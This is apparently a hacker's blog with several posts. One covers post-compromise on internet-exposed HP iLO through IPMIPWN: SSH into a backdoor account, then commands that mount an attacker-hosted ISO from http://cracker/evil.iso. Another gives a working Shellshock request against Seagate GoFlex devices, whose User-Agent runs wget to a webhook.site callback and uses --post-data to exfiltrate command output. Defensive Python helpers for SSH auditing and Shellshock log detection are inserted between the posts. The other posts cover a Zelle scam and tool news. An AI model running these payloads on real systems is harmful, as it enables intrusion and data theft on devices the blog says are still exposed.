Tuesday, February 18, 2025

IPMI exposure over the internet, IPMIPWN & post-compromise activities.


Another stop along memory lane is my favorite thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to take a look beyond initial penetration and at post-compromise activity.

It's been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the algorithms they offer for SSH are no longer supported by modern desktop SSH clients by default, so my first SSH attempt post IPMIPWN hax0rin went much like the below:
ssh backdoor2@target.com
Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to add -o KexAlgorithms=diffie-hellman-group14-sha1. Then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.

DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'target.com' (DSA) to the list of known hosts.

backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)

iLO 3 Standard 1.26 at  Aug 26 2011

Server Name: SER_EPAPAR

Server Power: On


</>hpiLO->
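
Taken together, the negotiation errors above are an inventory of what this iLO's SSH stack can do. Here is an added Python helper (not from the post and not part of IPMIPWN) that parses OpenSSH's "Unable to negotiate" messages and tags each offered algorithm with the reason a current client refuses it by default; the four messages are the ones quoted above, and the weakness rules are my own.

```python
import re
from typing import Dict, List

# OpenSSH reports one negotiation failure at a time. These four messages are
# copied from the post and used here as constructed sample input.
NEGOTIATION_ERRORS = [
    "Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1",
    "Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss",
    "Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc",
    "Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1",
]

ERROR_RE = re.compile(
    r"no matching (key exchange method|host key type|cipher|MAC) found\. Their offer: (\S+)"
)
CATEGORY = {"key exchange method": "kex", "host key type": "hostkey",
            "cipher": "cipher", "MAC": "mac"}

# Why a current OpenSSH client refuses each family by default. Patterns
# match whole families (every *-cbc cipher), not only the names in the post.
WEAK_RULES = [
    (r"group1-", "1024-bit DH group (Logjam-class precomputation)"),
    (r"-sha1(-96)?$", "SHA-1 based key exchange or MAC"),
    (r"^ssh-dss$", "1024-bit DSA host key"),
    (r"-cbc$", "CBC-mode cipher (plaintext recovery attacks)"),
    (r"^3des-", "64-bit block cipher (Sweet32)"),
]

def parse_offer(line: str) -> Dict[str, List[str]]:
    """Return {category: [algorithms]} from one 'Unable to negotiate' line."""
    m = ERROR_RE.search(line)
    return {CATEGORY[m.group(1)]: m.group(2).split(",")} if m else {}

def weaknesses(algorithm: str) -> List[str]:
    """Every weakness reason that applies to one algorithm name."""
    return [why for pattern, why in WEAK_RULES if re.search(pattern, algorithm)]

def audit(lines: List[str]) -> Dict[str, Dict[str, List[str]]]:
    """Aggregate offered algorithms and their weaknesses per category."""
    report: Dict[str, Dict[str, List[str]]] = {}
    for line in lines:
        for category, algs in parse_offer(line).items():
            report.setdefault(category, {}).update({a: weaknesses(a) for a in algs})
    return report

if __name__ == "__main__":
    for category, algs in audit(NEGOTIATION_ERRORS).items():
        for alg, why in algs.items():
            print(f"{category:8} {alg:30} {'; '.join(why) or 'no known weakness'}")
```

Every algorithm this firmware offers lands in at least one weak family, which is why the client had to be told to accept each one explicitly.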
Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve the virtual media (VM) functionality. Here is how that might be set up:

First, see what VM image is loaded, if any:

</>hpiLO-> show map1/oemhp_vm1/cddr1

Set our own VM image:

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM:

</>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes:

</map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great success: as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or on network connection confirmation. More attack paths later >:)


Enjoy the 1's and 0's.. 

Thursday, January 2, 2025

Happy New Year!!

so imma lil late, sue me :P

Wednesday, September 4, 2024

Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!

Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan despite all the time that has passed. That's not all, as they are now easier to verify thanks to web services like webhook.site. In the past, verifying you had RCE with these devices and the Shellshock bug in general could be tricky, but having something available to the public that catches callbacks makes it so much simpler.

Here is what the new payload looks like using webhook.site:

GET /support/ HTTP/1.1
Host: vuln.device.ip.here
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk2>&1;

Here is what it looks like when it hits webhook.site:

If you're testing this out yourself and using webhook.site to verify execution, and you see something like the above in your webhook session, w00t! You have just successfully verified that it's vulnerable to Shellshock, that it has wget installed, and that it's allowed to make calls outside of its network!

Going a bit further, you can also use this Shellshock/webhook.site combo to exfiltrate some information from the target by adding the --post-data flag to the wget payload with a bash command surrounded by backticks, like this:

--post-data `id`

wget will send the output of the command as post data to webhook :)  
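
Added example, not from the original post: a log check for the Shellshock payload shape shown above, run over constructed access-log lines. It flags the "() { :; };" prefix in the User-Agent, pulls out the callback URL the payload fetches, and marks a hit as exfiltration when wget's --post-data (or --post-file) is present; the 192.0.2.x clients and the webhook.example/TOKEN-PLACEHOLDER URL are placeholders, not real hosts.

```python
import re
from typing import Dict, List, Optional

# Constructed combined-format access-log lines. The 192.0.2.0/24 clients and
# the webhook.example/TOKEN-PLACEHOLDER URL are placeholders, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Sep/2024:10:00:01 +0000] "GET /support/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.11 - - [04/Sep/2024:10:00:02 +0000] "GET /support/ HTTP/1.1" 200 12 "-" "() { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://webhook.example/TOKEN-PLACEHOLDER/a -O /tmp/junk 2>&1;"
192.0.2.12 - - [04/Sep/2024:10:00:03 +0000] "GET /support/ HTTP/1.1" 200 12 "-" "() { :; }; /usr/bin/wget --post-data `id` http://webhook.example/TOKEN-PLACEHOLDER/a -O /dev/null"
"""

# Combined log format: client, request line, status, size, referer, user-agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "(.*)"$')

# Shellshock payloads are a bash function definition "() { ... };" followed by
# the commands a vulnerable bash runs when it imports the environment variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Where the payload phones home; anything after the URL is ignored.
URL_RE = re.compile(r"https?://[^\s'\"`;]+")

# wget flags that turn a plain callback into exfiltration of command output.
EXFIL_FLAGS = ("--post-data", "--post-file")

def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a Shellshock-style request, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, request, _status, _referer, user_agent = m.groups()
    if not SHELLSHOCK_RE.search(user_agent):
        return None
    return {
        "client": client,
        "request": request,
        "callback_urls": URL_RE.findall(user_agent),
        "exfil": any(flag in user_agent for flag in EXFIL_FLAGS),
    }

def scan_log(text: str) -> List[Dict[str, object]]:
    """Findings for every line of an access log, in file order."""
    return [f for f in map(analyze_line, text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        kind = "EXFIL" if f["exfil"] else "CALLBACK"
        print(f"{kind:8} {f['client']} {f['request']!r} -> {', '.join(f['callback_urls'])}")
```

The same check works on the device's own web logs or a reverse proxy in front of it, and the extracted callback host is what you would block or hunt for in egress logs.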

It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have devices in your network, please for the love of all that is good, update your firmware! 

That's it for now, enjoy the 1's and 0's

Friday, August 2, 2024

Arctic Code Vault Contributor: ✓

Since I am on an ego trip, I thought I would gloat some more by reminding all of a tool I developed with a friend of mine called Upnp-Exploiter, back when I still ran DC414, that made it into the GitHub Arctic Code Vault! So even after the zombie apocalypse, you can use my tool :) If you don't know what the Vault project is you can read more about it here. I am deeply honored by this and many thanks to GitHub for including our project!

That's not all for this project however; another friend of mine caught a glimpse of it being used in a pentest by a company called TraceSecurity! Below is a screen capture of it in the pentest report :) Nothing makes me prouder than my tools being used by fellow ethical hackers. I hope they got some findings with it on another host!
That's all for now. Enjoy the 1's and 0's.

Sunday, June 30, 2024

Hack3r Achievement Obtained!


You may have seen it on my X feed by now, but if not: I am proud to say my IPMIPWN tool was added to not only Kali Linux, but to BlackArch Linux as well!! This happened earlier, but I haven't bragged on the blog yet :) It's so amazing it was so well liked and used! I hope it has helped many hackers in their education and professional careers.

If you somehow don't know about these projects, welcome skiddy and go here and here and RTFM :P 

I love giving back to the scene that has helped me so much and I am always trying to do more. Now I can honestly say I have, in what I hope is a meaningful way! Thanks to whoever found my tool worthy and all the people at the Kali and BlackArch organizations. You are all awesome! Thank you!!

Enjoy the 1's and 0's :)

Wednesday, June 12, 2024

Go Tell That Spammer, The Scammer, The Crypto Jacker. Tell'em That God's Gonna Cut'em Down.

I HATE spammers, scammers, and just anything evil that tries to capitalize on the regular user, and for the most part I haven't really had any run-ins with them, but them bastards are getting crafty and crossed paths with me, so I thought I would share the tactics I observed and some of their junk.

I will start with a Facebook/Zelle scam that was tried against my wife. So Cmoney was posting stuff on FB to sell; she was asking around $200 for the item and she got a hit that same night at around 4AM. He wanted to pay and come get it ASAP, but said he wanted to use Zelle to buy it and then come get it later that day, as he was at work. We didn't use Zelle so we asked if he could use any other service, which he said no to and said he would pass. Well, Cmoney wanted to sell this thing so we got a Zelle account to accommodate this guy. We gave him our Zelle info to send money, and he then said he sent the payment, but nothing showed up on our end. Then an email came saying this BS:

For your account to be credited fully with the sum of $230.00 USD You are required to send the sum of $100.00 USD (FIRST) to the buyer's Zelle information for your buyer's safety

We of course were all, yeah f that. That's when I took a deeper look at the email from "Zelle" and noticed the from address was zellepay.customerservices024975@gmail.com, which is obviously not a Zelle email, but you don't see that address until you go into the header details; just hovering over the from/to area in Gmail shows the below:

So the address is so long that Gmail cuts off the domain and all you see is the Zelle portion. Here is a look at the expanded headers view:

So here there are some clues to its fakeness, as you can see the gmail.com domain. However, note the red box: GOOGLE SAYS IT'S AN IMPORTANT EMAIL!!! This is crazy and adds to its legitimacy.

Well, we figured WTH and played along, but told him we can't send the 100 bucks first. He then says he will pay it as long as we pay it back. We say sure, we will pay it back, no problem. We then get an email saying Zelle got it and all is good; he thought we would just send the 100 right away, but nah lol. We told him as soon as he sends the money for the item we will send his money back. We never heard back lol. I guess they don't like going off script. Maybe next time :)

Enjoy the 1's and 0's.

Friday, April 26, 2024

Getting GSMEvil2 working on Debian.

So MOST of the instructions on GSMEvil2's GitHub work fine, with the exception of the pip guidance. Here is what I had to use to get it working:

pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3


Yeah, it's a short post. Deal with it :P